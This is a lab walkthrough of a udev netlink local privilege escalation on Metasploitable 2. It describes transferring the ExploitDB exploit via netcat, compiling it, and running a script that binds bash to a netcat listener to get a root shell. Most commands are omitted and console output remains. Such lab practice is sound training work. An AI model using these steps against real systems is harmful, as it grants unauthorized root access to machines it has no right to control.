Linux Kernel 2.6 UDEV < 141 – Local Privilege Escalation Exploit Example
Victim: Metasploitable 2
Note: This exploit leverages a vulnerability in NETLINK.
More information on NETLINK can be found on the Linux Foundation website (http://www.linuxfoundation.org/collaborate/workgroups/networking/generic_netlink_howto).
Download the Exploit from ExploitDB
Head over to the Exploit Database and download Jon Oberheide’s udev exploit for Linux Kernel 2.6 (https://www.exploit-db.com/exploits/8572/).
Telnet to Metasploitable 2, then Upload and Compile the Exploit
Telnet to Metasploitable 2 then start a netcat listener.
In Kali, We’re going to tar the exploit and pipe the output to netcat.
In Metasploitable 2, we’re going to receive and untar the exploit, then compile it with gcc.
Trying 192.168.1.10...
Connected to 192.168.1.10.
Contact: msfdev[at]metasploit.com
Login with msfadmin/msfadmin to get started
metasploitable login:
Password:
Linux metasploitable 2.6.24-16-server #1 SMP i686
msfadmin@metasploitable:~$
listening on [any] 12345 ...
Open a new tab, tar the exploit and pipe the output to netcat
(UNKNOWN) [192.168.1.10] 12345 (?) open
Back in the first tab we can see our Kali Machine connect.
Allow a few seconds for the file transfer to complete then CTRL+C to end the session.
Check the exploit has been received, then compile with gcc.
msfadmin@metasploitable:~$
-rw-r--r-- 1 msfadmin msfadmin 2.9K 2015-11-05 04:14 8572.c
msfadmin@metasploitable:~$
Executing the Exploit
Now we just need to get the PID of the the udevd netlink socket on Metasploitable 2, create our run script (bind an instance of bash to a netcat listener) and execute the exploit
df552800 15 2738 00000001 0 0 00000000 2
msfadmin@metasploitable:~$
msfadmin@metasploitable:/tmp$
msfadmin@metasploitable:/tmp$
msfadmin@metasploitable:~$
Open a new tab and connect to the bind shell
(UNKNOWN) [192.168.1.10] 2345 (?) open
root@metasploitable:/#
root
Tags: privilege-escalation